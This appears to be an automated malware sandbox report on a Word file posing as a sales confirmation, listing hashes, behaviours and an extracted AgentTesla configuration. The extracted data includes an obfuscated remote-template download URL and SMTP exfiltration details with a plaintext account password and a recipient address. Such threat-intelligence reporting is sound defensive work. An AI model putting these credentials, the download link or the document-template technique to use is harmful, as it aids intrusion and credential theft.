General
-
Target
Sales confirmation-a13802KA.docx
-
Size
10KB
-
Sample
230419-jp4l4shb82
-
MD5
aa17844cf349edcb703a84874bf9b51f
-
SHA1
9c894354e8aac4c58f111c7405a3f92d93d3da4f
-
SHA256
e2f7f94897d3c542e882840cd25955f9bf9e1b1507955ee144bdf939adcce73e
-
SHA512
a3ac31637f009b6a717999a60dcc2c5ff032db791ef5c808654b728a7746f6353f3976ab44cb5bbc97e99e1ac87f57af8433076c23dc4c595d69768bcf2f9424
-
SSDEEP
192:ScIMmtPGT7G/bIwXOVOtlrV5SEzBC4vNq6sM63kp:SPXuT+xXOVOTbhlqHI
Static task
static1
Behavioral task
behavioral1
Sample
Sales confirmation-a13802KA.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Sales confirmation-a13802KA.docx
Resource
win10v2004-20230221-en
Malware Config
Extracted
http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%2IIOOOWOEOEOEOEOEOEOISISODOEOEOEOODOOOOOOWWOWOQQQOWOWOWOWOIIIDIIFIFIWOEOEOEOIFIDIFODFI@3221468051/r/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc
Extracted
agenttesla
Protocol: smtp- Host:
mail.strictfacilityservices.com - Port:
587 - Username:
accounts@strictfacilityservices.com - Password:
SFS!@#321 - Email To:
zamanic62@gmail.com
Targets
-
-
Target
Sales confirmation-a13802KA.docx
-
Size
10KB
-
MD5
aa17844cf349edcb703a84874bf9b51f
-
SHA1
9c894354e8aac4c58f111c7405a3f92d93d3da4f
-
SHA256
e2f7f94897d3c542e882840cd25955f9bf9e1b1507955ee144bdf939adcce73e
-
SHA512
a3ac31637f009b6a717999a60dcc2c5ff032db791ef5c808654b728a7746f6353f3976ab44cb5bbc97e99e1ac87f57af8433076c23dc4c595d69768bcf2f9424
-
SSDEEP
192:ScIMmtPGT7G/bIwXOVOtlrV5SEzBC4vNq6sM63kp:SPXuT+xXOVOTbhlqHI
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Drops file in System32 directory
-
Suspicious use of SetThreadContext
-